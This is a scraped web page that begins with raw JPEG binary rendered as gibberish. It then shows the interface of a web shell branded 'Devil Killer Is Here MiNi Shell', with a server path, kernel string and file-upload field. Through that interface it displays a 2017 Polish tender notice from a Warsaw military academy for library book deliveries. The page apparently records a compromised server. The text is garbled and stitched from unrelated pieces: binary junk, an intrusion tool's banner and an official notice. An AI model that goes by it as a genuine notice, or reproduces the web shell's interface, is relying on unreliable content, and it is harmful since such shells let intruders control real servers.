JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170201/17912-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.akademia.mil.pl' target='_blank'>http://www.akademia.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 17912 - 2017
              z dnia 2017-02-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: SUKCESYWNA DOSTAWA KSIĄŻEK KRAJOWYCH I ZAGRANICZNYCH W WERSJI DRUKOWANEJ, 
LUB NA NOŚNIKU ELEKTRONICZNYM DO BIBLIOTEKI GŁÓWNEJ AKADEMII SZTUKI WOJENNEJ
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Akademia Sztuki Wojennej, krajowy numer identyfikacyjny
              011574244, ul.
              al. Gen. A. Chruściela 
              103,
              00-910 
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              261814085, e-mail
              i.lopacinska@akademia.mil.pl, faks
              261813217.
              <br />
              Adres strony internetowej (URL): www.akademia.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Uczelnia publiczna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.akademia.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />osobiście lub listownie<br />
                Adres:
                <br />Akademia Sztuki Wojennej al. Chruściela 103, 00-910 Warszawa,Punkt Podawczy ASzWoj budynek nr 4  portiernia (parter)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>SUKCESYWNA DOSTAWA KSIĄŻEK KRAJOWYCH I ZAGRANICZNYCH W WERSJI DRUKOWANEJ, 
LUB NA NOŚNIKU ELEKTRONICZNYM DO BIBLIOTEKI GŁÓWNEJ AKADEMII SZTUKI WOJENNEJ
<br /><b>Numer referencyjny: </b>1/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>CZĘŚĆ  I 
1.	Sukcesywna dostawa książek krajowych, w wersji drukowanej lub na nośniku elektronicznym, do Biblioteki Głównej Akademii Sztuki Wojennej, określonych opisem bibliograficznym: autor, tytuł, miejsce i rok wydania w jednym lub wielu egzemplarzach na podstawie dostarczonych zamówień wraz z wykazami tytułów sporządzonych przez Zamawiającego z zakresu literatury naukowej, popularnonaukowej. Pod pojęciem sukcesywnej dostawy należy rozumieć dokonywanie etapami zamówień książek, złożonych przez Bibliotekę Główną ASzWoj.
2.	Książki będące przedmiotem zamówienia dotyczą poniżej wymienionych dziedzin:
a)	nauki humanistyczne,
b)	nauki matematyczno  przyrodnicze,
c)	nauki społeczne,
d)	nauki ekonomiczno  prawne,
e)	nauki inżynieryjne i techniczne,
f)	nauki o bezpieczeństwie i obronności
g)	pozostałe dziedziny, nie wymienione powyżej.
3.	Po złożeniu zamówienia przez Bibliotekę Główną ASzWoj, Wykonawca potwierdzi, 
w nieprzekraczalnym terminie 2 dni roboczych, odbiór zamówienia wraz z informacją 
o dostępności tytułów łącznie z wyceną, podając cenę książki do zapłaty przez Zamawiającego, cenę detaliczną netto sugerowaną przez Wydawcę i zastosowany rabat (zgodnie z ofertą).
4.	Dostawa książek nastąpi w ciągu maksymalnie 7 dni roboczych od dnia przekazania Zamawiającemu potwierdzenia przyjęcia zamówienia.
5.	Dostawa tytułów niepotwierdzonych (niskonakładowych, specjalistycznych książek krajowych wydawanych przez uczelnie wyższe, instytuty naukowe, muzea, stowarzyszenia, fundacje i inne instytucje, a także nie będące w obiegu księgarskim) nastąpi po uzgodnieniu terminu 
z Zamawiającym.
6.	Dostawa następuje na koszt i ryzyko Wykonawcy. Miejscem dostawy będzie siedziba Biblioteki Głównej ASzWoj.
7.	Zamawiający uprawniony będzie do kontroli przestrzegania uzgodnionych warunków dostawy 
i udzielania Wykonawcy w razie potrzeby niezbędnych wskazówek.
8.	 Zamawiający dokona odbioru ilościowego i jakościowego każdej dostarczonej partii książek. 
W przypadku niezgodności z zamówieniem Zamawiający powiadamia o tym fakcie Wykonawcę. Wykonawca potwierdzi przyjęcie reklamacji w ciągu 2 dni roboczych.
9.	W przypadku dostarczenia książek uszkodzonych lub niezgodnych z umową, Wykonawca zobowiązany jest do przyjęcia reklamacji i ich wymiany, na własny koszt, w terminie maksymalnie 7 dni roboczych od momentu uzyskania zgłoszenia.
10.	Usunięcie wady lub wymiana w ramach gwarancji następuje w terminie wskazanym w pkt. 9 lub w terminie uzgodnionym z bezpośrednim użytkownikiem, gdy wymaga tego specyfika albo złożoność naprawy. W przypadku nie podjęcia naprawy gwarancyjnej przez Wykonawcę, Wykonawca zwraca koszty naprawy dokonanej u innego Usługodawcy. 
11.	Okres gwarancji na książki wynosi minimum 12 miesięcy i obejmuje wszystkie wykryte podczas eksploatacji wady, w tym uszkodzenia powstałe w czasie poprawnego, zgodnego 
z przeznaczeniem użytkowania, przy czym Wykonawca może zaproponować dłuższy okres gwarancji.
12.	Wykonawca dostarcza do Biblioteki Głównej ASzWoj (wraz z dostawą książek), fakturę wystawioną na Akademię Sztuki Wojennej, która poza wymogami księgowymi musi zawierać dodatkowe informacje: cenę detaliczną netto książki sugerowaną przez Wydawcę, procent rabatu udzielonego przez Wykonawcę od tej ceny (zgodnie ze złożoną ofertą), nazwę jednostki organizacyjnej Zamawiającego oraz imię i nazwisko osoby dokonującej zakupu.
13.	Faktura opłacona będzie przelewem bankowym w ciągu 30 dni od daty otrzymania przez Zamawiającego oryginału faktury.
14.	Wykonawca będzie posiadał stronę internetową z opisem oferowanych produktów 
i możliwością bezpośredniego zakupu on-line.
15.	Szacunkowa (przewidywana) liczba zamawianych książek przez Zamawiającego w czasie trwania umowy może wynosić ok. 6377 szt. Rzeczywista ilość książek wynikać będzie 
z bieżących potrzeb  Zamawiającego.
16.	Umowa z wybranym Wykonawcą zostanie podpisana na wartość brutto jaką Zamawiający przeznacza na realizację zamówienia.
17.	Rzeczywiste wynagrodzenie Wykonawcy będzie wynikało z faktycznej liczby książek zakupionych przez Zamawiającego w okresie obowiązywania umowy. 
18.	Wykonawca zobowiązany jest do informowania przedstawiciela Zamawiającego o stanie zrealizowanych i przyjętych do realizacji zamówień, w formie raportu przesyłanego raz 
w miesiącu (ostatni dzień miesiąca) za pośrednictwem poczty elektronicznej.
19.	Zamawiający zastrzega sobie prawo opcji i gwarantuje zamówienie 20% wartości umowy, pozostałe 80% zostanie opcjonalnie zakupione w razie zajścia takiej potrzeby i w zakresie określonym przez Zamawiającego, do granicy pełnego wykorzystania środków finansowych zabezpieczonych na ten cel. W takim zakresie odpowiednio może ulec modyfikacji wartość umowy.
20.	Zamówienia będą realizowane w siedzibie Biblioteki Głównej Akademii Sztuki Wojennej, 
Al. gen. A. Chruściela 103, 00-910 Warszawa. 
21.	Realizacja dostaw będzie się odbywała w godzinach: od 8.00 do 14.00.

CZĘŚĆ  II 
1.	Sukcesywna dostawa książek zagranicznych, w wersji drukowanej lub na nośniku elektronicznym, do Biblioteki Głównej Akademii Sztuki Wojennej, określonych opisem bibliograficznym: autor, tytuł, miejsce i rok wydania w jednym lub wielu egzemplarzach na podstawie dostarczonych zamówień wraz z wykazami tytułów sporządzonych przez Zamawiającego z zakresu literatury naukowej, popularnonaukowej. Pod pojęciem sukcesywnej dostawy należy rozumieć dokonywanie etapami zamówień książek, złożonych przez Bibliotekę Główną ASzWoj.
2.	Książki będące przedmiotem zamówienia dotyczą poniżej wymienionych dziedzin:
h)	nauki humanistyczne,
i)	nauki matematyczno  przyrodnicze,
j)	nauki społeczne,
k)	nauki ekonomiczno  prawne,
l)	nauki inżynieryjne i techniczne,
m)	nauki o bezpieczeństwie i obronności
n)	pozostałe dziedziny, nie wymienione powyżej.
3.	Po złożeniu zamówienia przez Bibliotekę Główną ASzWoj, Wykonawca potwierdzi, 
w nieprzekraczalnym terminie 5 dni roboczych, odbiór zamówienia wraz z informacją 
o dostępności tytułów łącznie z wyceną, podając cenę książki do zapłaty przez Zamawiającego, cenę detaliczną netto sugerowaną przez Wydawcę i zastosowany rabat (zgodnie z ofertą).
4.	Dostawa książek nastąpi w ciągu maksymalnie 6 tygodni od dnia przekazania Zamawiającemu potwierdzenia przyjęcia zamówienia.
5.	Dostawa tytułów trudnodostępnych (niskonakładowych, specjalistycznych książek wydawanych przez uczelnie wyższe, instytuty naukowe, muzea, stowarzyszenia, fundacje i inne instytucje, a także nie będące w obiegu księgarskim) nastąpi po uzgodnieniu terminu z Zamawiającym.
6.	Dostawa następuje na koszt i ryzyko Wykonawcy. Miejscem dostawy będzie siedziba Biblioteki Głównej ASzWoj.
7.	Zamawiający uprawniony będzie do kontroli przestrzegania uzgodnionych warunków dostawy 
i udzielania Wykonawcy w razie potrzeby niezbędnych wskazówek.
8.	Zamawiający dokona odbioru ilościowego i jakościowego każdej dostarczonej partii książek. 
W przypadku niezgodności z zamówieniem Zamawiający powiadamia o tym fakcie Wykonawcę. Wykonawca potwierdzi przyjęcie reklamacji w ciągu 2 dni roboczych.
9.	W przypadku dostarczenia książek uszkodzonych lub niezgodnych z umową, Wykonawca zobowiązany jest do przyjęcia reklamacji i ich wymiany, na własny koszt, 
w terminie maksymalnie 30 dni roboczych od momentu uzyskania zgłoszenia.
10.	Usunięcie wady lub wymiana w ramach gwarancji następuje w terminie wskazanym 
w pkt. 9 lub w terminie uzgodnionym z Zamawiającym, gdy wymaga tego specyfika albo złożoność naprawy. W przypadku nie podjęcia naprawy gwarancyjnej przez Wykonawcę, Wykonawca zwraca koszty naprawy dokonanej u innego Usługodawcy.
11.	Okres gwarancji na książki wynosi minimum 12 miesięcy i obejmuje wszystkie wykryte podczas eksploatacji wady, w tym uszkodzenia powstałe w czasie poprawnego, zgodnego 
z przeznaczeniem użytkowania, przy czym Wykonawca może zaproponować dłuższy okres gwarancji.
12.	Wykonawca dostarcza do Biblioteki Głównej ASzWoj (wraz z dostawą książek), fakturę wystawioną na Akademię Sztuki Wojennej, która poza wymogami księgowymi musi zawierać dodatkowe informacje: cenę detaliczną netto książki sugerowaną przez Wydawcę, procent rabatu udzielonego przez Wykonawcę od tej ceny (zgodnie ze złożoną ofertą), nazwę jednostki organizacyjnej Zamawiającego oraz imię i nazwisko osoby dokonującej zakupu.
13.	Faktura opłacona będzie przelewem bankowym w ciągu 30 dni od daty otrzymania przez Zamawiającego oryginału faktury.
14.	Wykonawca będzie posiadał stronę internetową z opisem oferowanych produktów 
i możliwością bezpośredniego zakupu on-line.
15.	Szacunkowa (przewidywana) liczba zamawianych książek przez Zamawiającego 
w czasie trwania umowy może wynosić ok. 371 szt. Rzeczywista liczba książek wynikać będzie z bieżących potrzeb Zamawiającego.
16.	Umowa z wybranym Wykonawcą zostanie podpisana na wartość brutto jaką Zamawiający przeznacza na realizację zamówienia.
17.	Rzeczywiste wynagrodzenie Wykonawcy będzie wynikało z faktycznej liczby książek zakupionych przez Zamawiającego w okresie obowiązywania umowy. 
18.	Wykonawca zobowiązany jest do informowania przedstawiciela Zamawiającego o stanie zrealizowanych i przyjętych do realizacji zamówień, w formie raportu przesyłanego raz 
w miesiącu (ostatni dzień miesiąca) za pośrednictwem poczty elektronicznej.
19.	 Zamawiający zastrzega sobie prawo opcji i gwarantuje zamówienie 20% wartości umowy, pozostałe 80% zostanie opcjonalnie zakupione w razie zajścia takiej potrzeby 
i w zakresie określonym przez Zamawiającego, do granicy pełnego wykorzystania środków finansowych zabezpieczonych na ten cel. W takim zakresie odpowiednio może ulec modyfikacji wartość umowy.
20.	Zamówienia będą realizowane w siedzibie Biblioteki Głównej Akademii Sztuki Wojennej, Al. gen. A. Chruściela 103, 00-910 Warszawa. 
21.	Realizacja dostaw będzie się odbywała w godzinach: od 8.00 do 14.00.
<br /><br /><b>II.5) Główny kod CPV: </b>22111000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 24<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, że należycie wykonał:
dla części I -  jedną  dostawę której przedmiotem zamówienia była dostawa książek krajowych, (przy czym wartość tej dostawy była nie mniejsza niż:  150.000,00 zł brutto),  
z podaniem wartości, przedmiotu, daty wykonania i odbiorcy, oraz załączy dowody potwierdzające, że dostawa ta  została wykonana należycie (poświadczenia, lub oświadczenie, jeżeli z uzasadnionych przyczyn wykonawca nie może uzyskać poświadczenia) . Informacje 
w zakresie wiedzy i doświadczenia należy przedstawić zgodnie z załącznikiem nr 4 do SIWZ;
dla części II -  jedną  dostawę której przedmiotem zamówienia była dostawa książek  zagranicznych (przy czym wartość tej dostawy była nie mniejsza niż:  50.000,00 - zł. brutto) 
z podaniem wartości, przedmiotu, daty wykonania i odbiorcy, oraz załączy dowody potwierdzające, że dostawa ta  została wykonana należycie (poświadczenia, lub oświadczenie, jeżeli z uzasadnionych przyczyn wykonawca nie może uzyskać poświadczenia) . Informacje 
w zakresie wiedzy i doświadczenia należy przedstawić zgodnie z załącznikiem nr 4 do SIWZ;
W przypadku składania oferty na część I i II -  Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, że należycie wykonał:
jedną  dostawę której przedmiotem zamówienia była dostawa książek krajowych 
i zagranicznych, (przy czym wartość tej dostawy była nie mniejsza niż: 200.000,00 zł brutto 
z zastrzeżeniem, że wartość dostawy książek zagranicznych wynosiła minimum 50.000,00 zł brutto),  z podaniem wartości, przedmiotu, daty wykonania i odbiorcy, oraz załączy dowody potwierdzające, że dostawa ta  została wykonana należycie (poświadczenia, lub oświadczenie, jeżeli z uzasadnionych przyczyn wykonawca nie może uzyskać poświadczenia) . Informacje 
w zakresie wiedzy i doświadczenia należy przedstawić zgodnie z załącznikiem nr 4 do SIWZ;
lub
jedną  dostawę, której przedmiotem zamówienia była dostawa książek krajowych, (przy czym wartość tej dostaw była nie mniejsza niż: 150.000,00 zł brutto) oraz jedną  dostawę, której przedmiotem zamówienia była dostawa książek zagranicznych (przy czym wartość tej dostawy była nie mniejsza niż: 50.000,00 zł brutto), z podaniem wartości, przedmiotu, daty wykonania i odbiorcy, oraz załączy dowody potwierdzające, że dostawa ta  została wykonana należycie (poświadczenia, lub oświadczenie, jeżeli z uzasadnionych przyczyn wykonawca nie może uzyskać poświadczenia) . Informacje w zakresie wiedzy i doświadczenia należy przedstawić zgodnie z załącznikiem nr 4 do SIWZ;
-Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału 
w postępowaniu, kwoty będą wyrażane w walucie obcej, to kwoty te zostaną przeliczone przez Zamawiającego na PLN wg średniego kursu PLN w stosunku do walut obcych ogłaszanych przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) na dzień opublikowania ogłoszenia Biuletynie Zamówień Publicznych.


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
